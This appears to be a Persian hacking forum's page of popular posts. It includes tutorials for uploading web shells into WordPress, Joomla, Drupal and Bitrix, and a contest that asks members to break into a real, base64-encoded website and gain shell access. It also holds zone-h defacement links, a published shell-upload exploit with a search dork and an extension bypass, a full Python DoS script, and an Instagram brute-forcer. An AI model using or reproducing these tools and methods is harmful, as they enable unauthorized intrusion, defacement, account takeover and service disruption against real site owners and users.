رفتن به مطلب
  • Black
  • Blueberry
  • Slate
  • Blackcurrant
  • Watermelon
  • Strawberry
  • Orange
  • Banana
  • Apple
  • Emerald
  • Chocolate
  • Charcoal

عضویت ویژه طلایی گارد ایران با تخفیف 50%

برای عضویت کلیک کنید

پرچمداران


مطالب محبوب

در حال نمایش بیشترین مطالب پسند شده از زمان ۱۷/۰۹/۲۲ در همه بخش ها

  1. 8 points
    دوستان عزیز نیاز هستش که شما با ساختار اولیه حداقل cms های مشهور أشنا باشید. در این تاپیک علاوه بر نحوه آپلود شل در معروف ترین cms ها شما با ساختار و شناسایی cms ها نیز آشنا میشوید. در اولین آموزش نحوه آپلود شل در Wordpress رو به شما عزیزان آموزش میدم . wordpress به حدی معروف هست که نیاز به آموزش نداشت اما برای شروع ترجیح میدم از ابتدا شروع کنم Number of active sites: 20,580,941 Number of sites in top one million: 311,682 Most popular sites built with it: The New York Times, Forbes, Facebook Blog صفحه ادمین پیش فرض: http://site/wp-login.php Wordpress.rar
  2. 7 points
    به نام خدا سلام و عرض ادب خدمت تمامی بازدیدکنندگان و اعضای تیم امنیتی گاردایران.. خیلی وقت بود تاییک باز نکرده بودم در این تاپیک آموزش آپلود شل در انواع cms ها رو آموزش میدم خیلی از دوستان بعد از اینکه به هر طریقی وارد پنل مدیریت یک سایت میشوند برای آپلود شل به مشکل برمیخورند در این تاپیک سعی میکنم آموزش آپلود شل در تمام cms های مطرح رو آموزش بدم. لطفا به نکات زیر دقت فرمایید: اسپم ممنوع در این تاپیک فرض بر این گرفته شده شما به پنل ادمین دستزسی دارید پسورد فایل های ضمیمه شده : guardiran.org موفق و سربلند باشید.
  3. 7 points
    بسم الله الر حمن الر حیم ضمن عرض سلام و خسته نباشید و همچنین تسلیت ایام سوگواری محرم الحرام خدمت کاربران عزیز تیم امنیتی گارد ایران خواستم بعد یه مدت طولانی عدم فعالیت در تیم با کلی بادومو پسته برگردم براتون یه مسابقه آماده کردم با سطح پایین ../ با مسابقه شماره 8 در خدمتتون هستیم مراحل مسابقه طبق معمول : 1- دیکد تارگت 2-پیدا کردن نوع آسیب پذیری 3- نفوذ به وبسایت با آسیب پذیری کشف شده 4-گرفتن دسترسی شل اسکریپت و ارسال شل به همراه متد و روش نفوذ به سایت به خصوصی اینجانب تارگت : (Base 64) aHR0cDovL3Njcy1pdGV4YW0uc3kvUUFTLw== از تارگت بکاپ گرفته شده تا در صورت بروز مشکل تارگت بعدی آماده باشه و اما قوانین مسابقه : 1- تقلب و یا سوال از دیگران اکیدا ممنوع (برسی کامل انجام میشه در صورت مشاهده تخلف ، هم کسی که اطلاعات داده و هم کسی که سوال پرسیده جریمه میشه) 2- وبسایت مورد نفوذ قرار گرفته رو دیفیس نکنید و همچنین پس از تایید به هیچ وجه دوباره شل آپلود نکنید 3- اسپم ممنوع 4- پاسخ مسابقه رو به این عنوان ارسال کنید [Answer Racing 8] زمان مسابقه 3 روز (احتمالا تمدید هم بشه ) جوایز هم مشخص میشه به زودی :Solvers DeMoN
  4. 7 points
    1TED

    مسابقه شماره 8

    پ ن :/ دوستان خیلی ها با آپلود شل مشکل داشتن برای راحت تر شدن کار کافیه فقط توی بخش مدیریت لوگین کنید و اسکرین شاتشو برام بفرستین جوایز هم مشخص شد نفر اول : ارتقا به کاربر ویژه نقره ای + 500 لایک نفر دوم : 700 لایک نفر سوم : 500 لایک جوایز بقیه دوستان که پاسخ بدن : 250 لایک و همچنین در صورت عضو تازه وارد بودن به عضو انجمن ارتقا پیدا خواهند کرد ../ در نظر گرفته شده است ../
  5. 7 points
    دوست عزیز اگر منت میزاشتین و دفیسهای قبلی رو یه نگا میکردید میفهمیدید که همه دفیسها باید به اسم GuardIran Security Team ثبت بشن 3 تا لینک با سه اسم متفاوت ثبت کردید تا زمانی که به اسم GuardIran Security Team ثبت نشن هیچ ارزشی ندارن
  6. 6 points
    درود. در این تاپیک فقط دیفیس های ثبت شده در zone-h قرار میگیره. دیفیس هایی که در دیگر زون ها ثبت میشه در این تاپیک قرار میگیرد(روی لینک کلیک کنید)
  7. 6 points
    با آموزش آپلود شل در Joomla در خدمت شما عزیزان هستیم دومین cms برتر میان cms های موجود Joomla میباشد. Number of active sites: 2.486,271 Number of sites in top one million: 26,474 Most popular sites built with it: U.K National Crime Agency, OpenVPN, High Charts صفحه ادمین پیش فرض : http://site/administrator Joomla.part1.rar Joomla.part2.rar Joomla.part3.rar
  8. 6 points
  9. 6 points
  10. 6 points
  11. 6 points
  12. 6 points
    http://zone-h.org/mirror/id/30294008 http://zone-h.org/mirror/id/30294014
  13. 6 points
    http://zone-h.org/mirror/id/30294293 http://zone-h.org/mirror/id/30294053
  14. 6 points
    In The Name Of God کاربرد nmap 1- اسکن سریع تمامی پورت‌ها 2- شناسایی سیستم عامل هدف 3- ارسال پکت ناشناس جهت رد کردن فایروال 4- قابلیت اسکن محدوده خاصی از پورت‌ها 5- قابلیت Spoofing 6- قابلیت ذخیره سازی نتیجه اسکن با فرمت های مختلف 7- قبلیت تنظیم TTL برای رد کردن فایروال هوشمند 8- قابلیت زمانبندی ارسال پکت‌ها جهت اسکن هوشمند 9- قابلیت شناسایی سرویس‌ها با پورت باز 10- قابلیت تنظیم تکنیک‌های مختلف اسکن ==================================================================== دستورات کار بردی Nmap اسکن سریع یک سیستم هدف: nmap -F 192.168.1.1 اسکن سریع همراه با ارائه جزئیات و نسخه پورت‌ها: nmap -v 192.168.1.1 شناسایی سیستم عامل به همراه اسکن با جزئیات: nmap -v -A 192.168.1.1 اسکن کامل با بازه دلخواه شماره پورت‌ها: nmap -v -p 1-100 192.168.1.1 اسکن با ارسال پکت‌های تصادفی جهت جلوگیری از بلاک شدن در فایروال سیستم مقصد: nmap -v -f اسکن یک سیستم در مواقعی که سیستم مقصد ping را بلاک کرده باشد.: nmap -v -Pn برای tcp connection هست nmap -sP ========================================================================================================================================================================== اسکریپت های کار بردی Nmap (خودم خیلی استفاده میکنم!) whois ip!? nmap -p 80 --script whois-ip (iptarget shoma) whois url!? nmap -p 80 --script whois-domain (adres target) پیدا کردن موقعیت جغرافیایی هدف: namp -p 80 --script ip-geolocation-* (adres ip target) پیدا کردن دامین های زیر مجموعه سایت: nmap -p 80 --script dns-brut (adres target) شناسایی فایروال: nmap -p 80 --script http-waf-detect (adres target) شهر و آدرس نسبی: nmap --script ip-geolocation-maxmind <target> پیدا کردن دامین های زیر مجموعه سایت: nmap -p 80 --script dns-brut adres (target) دوستان اگر اسکریپت های بهتر میشناسید لطفا قرار بدید تا استفاده کنیم!
  15. 5 points
    با سلام دوست عزیز این مودم n727 هیچ مشکلی نداره اصلا در ضمن جز اون دسته از مودماس که خوب برا پاکت ایجکت حواب میده بنده الان یه 2 سالی هس دارمش مشکلی هم تو کانکت نداره اگر خواستین بردشو زیاد کنین مثل الفا یه رکورد دارم که اگر وقت شد میزارم اگر در حالت عادی 100متر جواب بده با این روش تا 300 متر هم جولب میده
  16. 5 points
    challenge done باگ خیلی ضایعی داشت. کافی بود ادم چشم هاشو واز کنه. من و اقا ایمان استارت رو زدیم.
  17. 5 points
    تغییر آیکون ها در ویندوز 10 با سلام خدمت عزیزان. با آموزش تغییر آیکون ها و زیباسازی ویندوز 10 در خدمت شما هستیم. هیچکس از زیبا بودن صفحه دسکتاپش بدش نمیاد. هدف ما از این آموزش تبدیل یک صفحه دسکتاپ ساده به یک صفحه دسکتاپ زیباست(متناسب با سلیقه شخص) نمونه: در مورد Widget ها که قبلا آموزش دادم و میتونید در پست قبلی استفاده کنید. اما آیکون ها. سایت معروف deviantart.com که منبع انواع تم,آیکون و... است که میتونید استفاده کنید. خوب ما از iconpak های این سایت استفاده میکنیم تا مقداری به زیبایی صفحه دسکتاپ خودمون برسیم. نمونه ای از آیکون پک زیبایی که دیدم رو در اختیارتون قرار میدم. کلیک کنید 1-با استفاده از لینک دانلود موجود در سمت راست صفحه آیکون پک رو دانلود میکنیم. 2-با جرای فایل Flat Color Win10 میریم به قسمت نصب. 3-با اجرای فایل Run.exe و فشردن دکمه Enter وارد مرحله نصب میشیم. 4-مدت زمان کوتاهی طول میکشه تا پروسه نصب به اتمام برسه و پس از پایان مراحل نصب تایمر ده ثانیه ای برای ری استارت ویندوز فعال میشه و بعد از ری استارت شاهد خواهیم بود که آیکون ها به خوبی نصب شدن. موفق باشید
  18. 5 points
    آموزش آپلود شل در Drupal سومین cms برتر که سایت های بسیار زیاد و معروفی در حال حاضر ازش استفاده میکنند. Number of active sites: 1,194,014 Number of sites in top one million: 31,218 Most popular sites built with it: Linux, The Twitter blog, Harvard University صفحه ادمین پیش فرض : http://site/user/login Drupal.part1.rar Drupal.part2.rar Drupal.part3.rar
  19. 5 points
  20. 5 points
    cxsecurity url : https://cxsecurity.com/issue/WLB-2017090213 ############################################################################## # Title:fast-signup shell uploading # vendor: n/a # Exploit Author : Guardiran Security Team # Tested On : ubuntu / Windows 8.1 # # Dork: inurl:fast-signup.php # # ----------------------------------------------- # # # Description : # an uncontrolled profile image uploader enables attacker to upload shell remotely # # # # # # POC: # first find targets with the dork above and signup by uploading a normal photo in this step. then # login(sometime it will login automatically) after that go to "My Photo" click on "Manage My photo" # "Modify Photo 1" now upload your shell.php here :) open your profile photo(the shell you uploaded) # url will be like this: # http://sitedomain.com/photoprocess.php?image=memphoto1/209975shell.php&amp;square=100 # # change it to this order: # http://sitedomain.com/memphoto1/123456shell.php # Now you are done :) # 123456 is a random number that the website will add to your file name so it can be any thing else # # Bypass: # in some of targets i saw that they have denied .php file so upload your shell as .PHP :) # # # # ############################################################################## exploit.txt
  21. 5 points
    با درود اینم 3تا به خاطر این چند روز نبودم http://zone-h.org/mirror/id/30290410 http://zone-h.org/mirror/id/30290363 http://zone-h.org/mirror/id/30267302
  22. 5 points
    سلام قصد بی احترامی ندارم اما منفجررر کردی با این آموزش! اول اینکه هک سایت نوشتید موضوع لطفا بنویسید اسکن و نفوذ با wp scan دوم اینکه یوزر پیدا کردن ورد پرس که کاری نداره ! >>> مثال >>>> target.com/?uathor=1 سوم خب ما یوزر که خیلی ساده بدست اوردیم الان ایا سایتو شما هک کردید!!!؟ هنو پنل مونده ! گفتید با اسکریپت ادمین فایندر نوشته شده توسط پرل دوستان این کار انجام بدن! خب چرا با پرل !؟ ۹۹درصد وردپرسی ها به راحتی صفحه ادمین سایتشون پیدا میشه ! مثال>>>target.com/wp-admin چهارم! خب حالا ما در صفحه لاگین قرار داریم خب که چی !؟ مثلا هک شد!!!!؟ نه اومدیم و کد کپچا داشت اونوقت چکار کنیم! اصلا شما اول نسخه وردپرس بدست بیار شاید تونستی شل بزنی!! مدیرا ببخشید اگر تند صحبت کردم!
  23. 5 points
    MR.wIzArD

    ddos python

    import time import socket import os import sys import string #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# def restart_program(): python = sys.executable os.execl(python, python, * sys.argv) curdir = os.getcwd() #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# print ("DDoS mode loaded") print ("python script made by MR.w!zArD twitter") host=raw_input( "Site you want to DDoS:" ) port=input( "Port you want to attack:" ) message=raw_input( "Input the message you want to send:" ) conn=input( "How many connections you want to make:" ) ip = socket.gethostbyname( host ) print ("[" + ip + "]") print ( "[Ip is locked]" ) print ( "[Attacking " + host + "]" ) print ("+----------------------------+") def dos(): #pid = os.fork() ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: ddos.connect((host, 80)) ddos.send( message ) ddos.sendto( message, (ip, port) ) ddos.send( message ); except socket.error, msg: print("|[Connection Failed] |") print ( "|[DDoS Attack Engaged] |") ddos.close() for i in range(1, conn): dos() print ("+----------------------------+") print("The connections you requested had finished") if __name__ == "__main__": answer = raw_input("Do you want to ddos more?") if answer.strip() in "y Y yes Yes YES".split(): restart_program() else: os.system(curdir+"Deqmain.py") دیداسر نوشتن کاری نداره مهم قوی بودن کتاب خونه هات هستن!
  24. 5 points
    به زودی اموزش رو در انجمن قرار میدم. لطفا قوانین رو رعایت کنید تو‌ بخش سوال و‌جواب باید مشکل رو مطرح میکردید. این قسمت فقط مختص به درخواست لوکال روت ها میباشد.
  25. 5 points
    با سلام بنده مطمعن هستم شما اصلا به ویدو دقت نکردین و اگر دقت کنین لینکهایی که توی ویدو هس و الان که لینک میده با هم متفاوت هستن در زمان خودش لینک رو از ساب دامین شرکت فیسبوک میداد در حالی که الان لینک رو از سایت website7 برا کاربرا ارئه میده در سایه حق
  26. 5 points
    فقط من هرچی سعی کردم اسم خودمو بزارم روی دیفیس , نشد http://www.zone-h.org/mirror/id/30274375 شبتون حیدری
  27. 5 points
    http://zone-h.org/mirror/id/30274365 اگه لینک اشتباه بود , بگید حتما لینک درستو بدم! یا علی
  28. 5 points
    انشالاه مورد قبول قرار بگیرد! http://www.zone-h.org/mirror/id/30274167
  29. 4 points
    با نرم افزار افترافکت یه استارتر 15 ثانیه ای آماده کردم که میشه ازش توی اول هر ویدیو آموزشی استفاده کرد. امیدوارم مفید باشه. فایل رو بصورت فشرده پیوست کردم. پسور: guardiran.org GuardIran.rar
  30. 4 points
    یه طرح زدم برای کاربران تازه وارد محترمی که نمیخوان آواتارشون ثابت باشه.
  31. 4 points
    http://www.zone-h.org/mirror/id/30386744 http://www.zone-h.org/mirror/id/30386743 http://www.zone-h.org/mirror/id/30386746 http://www.zone-h.org/mirror/id/30386745
  32. 4 points
    با سلام خدمت تمامی دوستان عزیز نحوه کارکرد برنامه به این گونه میباشد که شما دوستان اگر در سیستم عامل ویندوز اجرا کنید نیاز به کامپایلر پایتون دارید و کار باهاش به توضیح خاصی نیاز نداره چون وقتی برنامه رو اجرا میکنید از تون دوتا چیز میخواد اول نام کاربری هدف و دوم پسورد لیست شما رو میخواد اما نکته ای که داره باید پس لیست شما در کنار فایل بروتر باشه تا راختر کارو به اتمام برسونه وقتی برنامه رو اجرا کردید (نیاز به مفسر پایتون هستش) برنامه به شما پیغام [+] Enter The Victim Username:نشون میده و شما نام کاربری یا همون یوزر اینستارو میدین و اینتر میزنید بعد برنامه به شما پیغام [+] Enter The Direction of Password Listنشون خواهد داد که در این قسمت شما باید ادرس اونجایی که پس لیستتون قرار داره رو بهش بدین وبعد اینتر و برنامه شروع میکنه به تست کردن فیلد های username و password واگر برنامه تونست با موفقیت به پیج مورد نظر وارد بشه به شما پیغام Login Successfullرو نشون میده و در زیر اون براتون پسورد رو با پیغام [!] The Password Isبه شما نشون میده در رابطه با دوستانی که میخوان تو سیستم عامل لینوکس اچرا کنن چیزی نمیخواد چون سیستم عامل لینوکس بصورت اوتومات ورژن 2.7 پایتون رو رو خودش نصب داره و شما میتونید با نوشتن کلمه پایتون و اسم فایل اونو اجرا کنین نکته : تنها خواهشی که بنده دارم از همه دوستان اینه که اگر در روز بجای رفتن دونبال موزیک های داخل کلیپ های اینستا یا دیگر موارد روزی 20 دقیقه رو برای مطالعه روی تحلیل بزارید خیلی جاها نیاز ندارید که برید دنبال نحوه کارگرد برنامه و خودتون به سادگی با نگاه کردن به دستور میتونید بفهمید چی به چیه امیدوارم کمکی کرده باشم در سایه حق
  33. 4 points
    با سلام و خسته نباشید. جلد اول خیلی خوب و مفید هست. همچنان منتظر جلد های بعدی کتاب هستیم،لطفا سریع تر ارائه بدید.
  34. 4 points
    Accepted ../ بسیار عالی ♥
  35. 4 points
    بخش اول : توضیحات ابتدایی و آشنایی با اصطلاحات سلام خوب طبق لیست سرفصل های آموزش اولین بخش رو خدمتتون ارائه میدیم تا بخش های بعدی آماده بشن. در این بخش توضیحات ابتدایی برای شروع کار ماینینگ و توضیحاتی درباره ی اصطلاحاتی که در دوره استفاده خواهد شد داده شده. اگر علاقه به شروع این کار پردرآمد دارین تمام بخش هارو دنبال کنید تا در بخش های بعدی دچار مشکل نشید. موفق باشید Pass : guardiran.org Mining1.rar
  36. 4 points
    Done./ مسابقه رو استارت بزنیم بلکه دوستان هم شروع کنن.
  37. 4 points
    با سلام برنامه به زبان پایتون نوشته شده برا بقیه زبانهارو نمیدونم اما این برنامه تو 73 خط نوشته شده سادگی و خوانایی کد ها + کلمات انگلیسی کاملا معنادار هم که باید بدونید از ویژگی های این زبان قدرتمنده نمیگم زبونای دیگه مثل سی و جاوا بدرد نمیخورن اما ساده تر و خواناتر از پایتون وجود نداره این برنامه با این تعداد خط کاملا نشون میده به رقباش که حرفای زیادی برای گفتن داره لینک اسکن سورس برنامه https://www.virustotal.com/#/file/32b4bd9ef3407b6a223254642e24ddadf30d07054fe4342a8e193ab9f861961e/detection بابت فایل های اضافی تولید شده عذر میخوام کتابخانه گرافیکی پایتون چند سالی هست منتشر شده برای همین روش های زیادی برای تبدیل برنامه های گرافیکی پایتون به فایل اجرایی ویندوز وجود نداره . ایشالله که این مشکل هم برطرف بشه . فایل GmailSender.exe رو باز کنید . نکته: این برنامه اول باید وارد اکانت جیمیلتون بشه بعد شما بتونید ایمیل خودتونو بفرستید سرعتش مناسبه فعلا ورژن اول هست و تغییرات حتما صورت میگیره ایشالله نگران ویروسی بودن برنامه نباشید لینک اسکن قرار داده شده خودتون هم میتونید فایل رو دانلود و دوباره اسکن کنید . التماس دعا GmailSender.part1.rar GmailSender.part2.rar
  38. 4 points
    سلام مجدد خدمت کاربران گرامی چند روز پیش آموزش ساخت اکانت آنتی اسپم رو برای تلگرام قرار دادم ... امروز آموزش ساخت نامحدود مخاطب و اد لیست تلگرام رو به همراه تمامی فایل های مورد نیاز نصبی قرار میدم که در بقیه سایت ها یا به شکل پراکنده و با موضوعات دیگر قرار گرفته و یا با قیمت خاص فروش میره ... آموزش تبدیل فایل تکست به اکسل رو در پست بعدی قرار میدم ک مکمل این مطلب هستش برای مرحله اولیه کار و همچنین 3 ادلیست کاملا متنوع (تکست) و یک اد لیست 500 تایی اکسل شده جهت استفاده شما عزیزان در فایل قرار دادم که نمونه فایل آماده رو ببینید ... نکته * فایل خروجی و نهایی شما باید با استفاده از برنامه های قرارداده شده و با فرمت VCF باشد تا قابلیت اد کردن در تلفن اندروید شمارو داشته باشد و برای کاربران آیفون جهت اضافه کردن لیست باید فایل رو در icloud یا سیستم های شیر ابری قرار بدهند و با تلفن دانلود و منتقل کنند ( پیشنهاد استفاده از سیستم مخاطب گوگل هستش ) CALT.rar
  39. 4 points
    آموزش تبدیل فایل TXT به XLS ... 1- ابتدا پنجره مربوط به ایکسل را تمام صفحه کنید. و سپس به قسمت data رفته و بر روی from text کلیک کنید. 2- فایل نوشتاری مورد نظر را مسیر یابی کرده و انتخاب کنید و بر روی import کلیک کنید 3- اگر داده های شما به صورت مرتب هستند و همه ستون ها در جای خود مشخص هستند می توانید گزیته fixed width را انتخاب کنید و به صورت دستی مکان جدا سازی داده ها را برای قرار گیری در ستون های مختلف انتخاب کنید. ولی اگر داده های شما در هر ردیف با استفاده از کاراکتری خاص مانند ; یا , یا … از هم متمایز هستند می توانید به راحتی گزینه delimited را انتخاب کنید. در بخش پایین این کادر نحوه جدا سازی و قرار گیری در فایل ایکسل به صورت پیش نمایش مشخص است که به شما برای انتخاب بهتر کمک می کند. بر روی گزینه next کلیک کنید. 4- در کادر بعدی اگر گزینه fixed width را انتخاب کرده باشید می توانید مکان جداسازی را به صورت دستی انتخاب کنید. و اگر گزینه Delimited را انتخاب کرده باشید گزینه هایی که می توانید با استفاده از آن فایل نوشتاری را به درستی در ایکسل بارگیری کنید را خواهید دید. می توانید از کادر پایین به منظور جداسازی بهتر استفاده کنید. اگر داده های شما با استفاده از , یا ; یا فاصله و یا tab ، در هر ردیف از یکدیگر جدا شده اند به راحتی گزینه مربوط را از بخش delimiters انتخاب کنید و next را کلیک کنید. اگر داده ها با استفاده از جدا کننده دیگری از یکدیگر تفکیک شده اند می توانید با انتخاب گزینه other و نوشتن جداساز مورد نظر، فایل خود را آماده ی بارگذاری در ایکسل کنید. 5- در کادر بعدی می توانید نوع هر ستون را مشخص کنید.برای اینکار بر روی ستون مورد نظر کلیک کنید و سپس گزینه مناسب را انتخاب کنید. اگر گزینه general را انتخاب کنید داده های عددی به صورت خودکار شناسایی می شوند و ایکسل می تواند عملیات ریاضی را بر روی آنها انجام دهد. اگر گزینه date را انتخاب کنید ، ستون مورد نظر به عنوان تاریخ شناسایی خواهد شد اگر text را انتخاب کنید ، ستون مورد نظر به عنوان متن شناسایی خواهد شد. 6- بر روی finish کلیک کنید از فرامسیر با ادیت *
  40. 4 points
    دوستان بارها عرض کردیم برای کرنل های ۲۰۱۶ و قبل از ۲۰۱۶ ابتدا dirty cow رو تست کنید اگر با مشکل مواجه شدید در همین تابیک لوکال روت 2016 فبلا قرار دادیم.. برای ۲۰۱۷ هم به جز این لوکال روت چیزی بایلیک نشده... https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074 موفق باشد
  41. 4 points
    بسم الله الرحمن الرحيم در این تاپیک اموزش نحوه ی شروع کار با اسکنر wpscan و سپس نحوه ی دسترسی به پلاگین و .....را خواهیم گفت وردپرس سیستمی قدرتمند در طراحی وب هست که تاحالا کارش بینظیر بوده و حرف نداشته . سایت های معتبری در جهان مانند bbcamrican. Com از این سیستم استفاده میکنند. حالا ما کاری با قدرت و کیفیتش نداریم . هکر کارش نفوذ هست درهمه شرایط خوب بریم سراغ آموزش برای این نو ع سیستم اسکنر های خوبی ساخته شده که قدرتمند ترینش wpscan هست که توی کالی لینوکس موجوده ولی اطلاع ندارم که توی بکترک نصب هست یا باید نصب کرد. ابتدا ترمینال رو باز کنید و دستور زیر رو تایپ کنید: wpscan پس از این که تایپ کردید و انتر را زدید وارد محیط این ابزار قدرتمند میشوید حال ما میخواهیم اسکن کنیم تایپ کنید: wpscan --url target. Com نکته ی مهمی که اینجا باید گفت اینکه دقت کنید آدرس سایت رو باhttps شروع نکنید اگر هم کپی پیست کردید خودتون پاکش کنید صبر کنید تا اسکن تموم شه. الان داره پلاگین هار و پیدا میکنه دوستان شما میتونید از طریق پلاگین هم به سایت حمله کنید و از طریق اسکپلویت های داده شده اول باید پلاگین ها را با ورژن اونها پیدا کنید سپس دنبال اکسپلویت هاش بگردید بروت فورس را در تاپیک بعد خواهم گفت نکات مهم : اگر میخواهید به صفحه ی ادمین دسترسی پیدا کنید باید تایپ کنید wp -login.php Or Wp-admin میتونید از admin.perlهم استفاده کنید . این بازار انقدر تست میکند تا بالا آخره به صفحه ی ادمین برسد . البته زیاد قابل استفاده برای سایت های ورد پرس نیست این برنامه که به زبان perl نوشته شده تو ی نفوذ با برنامه sqlmap خیلی کاربرد داره. اگر شما یوزر نیم رو اشتباه وارد کنید به شما اخطار میده که یوزر نیز اشتباه است اما اگر پسورد رو اشتباه وارد کنید میگه پسورد شما برای یوزر مورد نظر اشتباه است خیلی جالبه . این ویژگی از جالب ترین ویژگی ها در زمینه وردپرس هست که باید میدانستید
  42. 4 points
    با سلام در جواب شما وبرخلاف دوستان بنده میگم بسادگی میشه در اورد 1-اگر دسرسی دارید به سخت افزار میتونید با افزودن 1 ولت به اداپتور اون پسورد رو کلا بردارید مثلا دیدین به باطری کوشی شوک میدن عین همون میگم اما ولتاژنباید بیشتر از 3ولت باشه چون به ایسی که برا ذخیره پس قرار داره اسیب میزنه 2-ولی اگر دسرسی ندارید و ریموت میخواین اینکارو انجام بدین باس نوع دستگاه رو بدونین یا حداقل نوع فریمورک اونو چون یکسری برنامه ها هستن که شما میتونین با اونا پسوردایی که میدن رو وارد کنید وبدون هیچ دغ دغه ای متصل شید (superpassword) مثلا این برنامه زیادن ولی بنده برای مثال یک نمونه گفتم درضمن نمیخواستم جواب بدن چون تاریخ پست بیشتر از یکسالی هس که میگذره جواب دادم تا اون دیدگاهایی که دوستان دارن رو شاید عوض کنم در سایه حق
  43. 4 points
  44. 4 points
    درود. یکبار دیگه هم تذکر داده شده ولی متاسفانه بازم شاهد پست اسپم از شما هستیم. سایت هایی که در زون ها غیر از زون اچ ثبت میشن در تاپیک زیر ققرار میگیرن و این نکته رو هم عرض کنم که ملاک ما دیفیس های ثبت شده در زون اچ هست. یا علی
  45. 3 points
    محققین امنیتی باج‌افزار جدیدی را در سیستم عامل اندروید شناسایی کرده‌اند که اطلاعات را در دستگاه‌های آلوده شده رمزگذاری کرده و همچنین شماره پین را تغییر می‌دهد. بدین ترتیب کاربر که دیگر قادر به استفاده از دستگاهش نیست، مجبور می‌شود به خواسته‌های افراد مجرم تن دهد. این باج‌افزار که با نام DoubleLocker شناخته می‌شود از طریق دانلود جعلی برنامه فلش پلیر در وب‌سایت‌های آلوده پخش می‌شود. این باج‌افزار سپس با اجرای برنامه جعلی فلش پلیر فعال خواهد شد. برنامه درخواست دسترسی خود را تحت نام Google Play Service به کاربر ارائه کرده و بدین ترتیب از دسترسی تایید شده به منظور در اختیار داشتن اختیارات ادمین سوءاستفاده کرده و خود را به عنوان اپلیکیشن پیش‌فرض Home تعیین می‌کند، بدون اینکه کاربر خبر داشته باشد. از آنجایی که باج‌افزار خود را به عنوان لانچر تعریف کرده، هر زمان که کاربر روی دکمه Home لمس کند باعث فعال شدن آن خواهد شد. برای خلاص شدن از دست باج‌افزار DoubleLocker ، تنها راه انجام فکتوری ریست می‌باشد. همچنین اگر از یک دستگاه روت شده استفاده می‌کنید بدون انجام فکتوری ریست می‌توانید از قفل پین عبور کنید. بدین منظور باید دستگاه پیش از فعال شدن باج‌افزار در حالت Debugging قرار گرفته باشد. اگر چنین بود باید دستگاه را در حالت ADB به کامپیوتر متصل کرده و سپس تمام فایل‌های سیستمی اندروید که پین کد در آنها ذخیره می‌شود را حذف نمایید. این فرآیند منجر به باز شدن قفل و دسترسی کاربر به دستگاهش خواهد شد. سپس در حالت Safe Mode کاربر می‌تواند اختیارات ادمین را برای این باج‌افزار غیرفعال کرده و سپس آن را حذف نماید. در برخی مواقع ریبوت کردن دستگاه ضروری خواهد بود. باج‌افزار DoubleLocker بر پایه یک تروجان بانکی طراحی شده و اگرچه در حال حاضر ماژولی برای دزدیدن اطلاعات بانکی افراد ندارد، اما این قابلیت در آینده به سادگی قابل افزودن خواهد بود. در واقع به گفته یکی از محققین شرکت امنیتی ESET، باج‌افزار DoubleLocker ممکن است به یک ابزار دو مرحله‌ای با عنوان باج‌افزار-بانک‌دار تبدیل شود که ابتدا حساب بانکی یا پی‌پال شما را پاک کرده و سپس دستگاه و اطلاعات درون آن را قفل نموده و از شما درخواست باج می‌کند. تا این لحظه میزان باج درخواستی دابل‌لاکر چیزی حدود 73 دلار است که از کاربر خواسته می‌شود ظرف مدت 24 ساعت پرداخت گردد. به گفته ESET پس از گذشت این مدت زمان، مهاجمین اطلاعات کاربر را پاک نکرده و به همان حالت رمزگذاری شده نگه می‌دارند. این شرکت امنیتی به کاربران توصیه می‌کند ضمن استفاده از یک آنتی‌ویروس مناسب در اندروید، ویژگی Unknown Sources را حتما در حالت غیرفعال قرار دهند تا درگیر چنین سوءاستفاده‌هایی نگردند. همچنین کاربران باید همواره حواسشان به مجوزهای درخواستی باشد و بدون دقت این دسترسی‌ها را به اپلیکیشن‌های مختلف ندهند. منبع: wccftech "لازم به ذکر هست که این نوع الگوریتم فعالیت باج افزار یک روش ابداعی بوده که در اینده میتواند دارای پیچیدگیهای بیشتری شود."
  46. 3 points
    با عرض سلام خدمت دوستان توی این پست قصد دارم توضیحات مختصری رو در خصوص ابزار Trity ارائه بدم. Trity به ادعای نویسنده ش و برخی وبسایت های معرفی نرم افزار یه ابزار پیشرفته تست نفوذ مبتنی بر لینوکس هست که برای هرکاری از تست آسیب پذیری تا اسپوفینگ تا مسائل مربوط به رمزنگاری رو پوشش میده. تو محیط کالی، ترمینال رو باز کنید و از این کد برای نصب تریتی استفاده کنید: git clone https://github.com/toxic-ig/Trity.git بعد از دانلود، به پوشه تریتی مراجعه کنید. (برای این کار بنویسید LS و اگر توی نتیجه اسم پوشه رو دیدی بنویسید : cd trity بعد از ورود به پوشه بنویسید : sudo python install.py از اونجا که ابزار تریتی دارای یک سری وابستگی ها (Dependencies) هست، این دستور باعث میشه که کالی وابستگی ها و پیش نیازها رو بررسی کنه و اگر هم نصب نبودند، شروع میکنه به دانلود اونها. اگر در آینده فریمورک دیگه ای هم مورد نیاز باشه دانلود میکنه. بعد از اینکه این مراحل تموم شد، اسم برنامه رو بنویسید و اینتر کنید: trity نکته هم اینکه اگر در زمان نصب این ابزار با خطای import مثل خطای ImportError: No module named mechanize مواجه شدید، از این کد برای حل مشکل و نصب magazine استفاده کنید: sudo apt-get install python-mechanize فایل zip این ابزار هم با پسورد guardiran.org پیوست کردم اما سعی کنید دستی نصبش کنید تا با تایپ کردن کد حل مسایل توی ذهنتون بمونه. تصویری از محیط نرم افزار : Trity-master.zip
  47. 3 points
    آموزش آپلود شل در Bitrix از دیگر cms های محبوب... Number of active sites: 217,541 Number of sites in top one million: 4,057 Most popular sites built with it: Citrus, Eldorado, Leroymerlin صفحه ادمین پیش فرض : http://site/bitrix/admin bitrix cms.rar
  48. 3 points
    سلام دوست عزیز در ابتدا تاپیک ذکر شده که اسپم ندید. ویدئو آموزشی بعد از اتمام مسابقه ضبط میشه موفق باشید
  49. 3 points
    لینک اسکن دوست عزیزمون : https://virusscan.jotti.org/en-US/filescanjob/y7a0jxded6
  50. 3 points
    با سلام جلد دوم رو به خاطر مشکلاتی که این چند وقته درگیرشون شدم تموم نکردم ولی اگر درخواست ها زیاد باشه نوشتن اونهارو ادامه میدم... تعداد لایک های این پست اونرو مشخص میکنه سوالی داشتید من در خدمتم

درباره ی ما

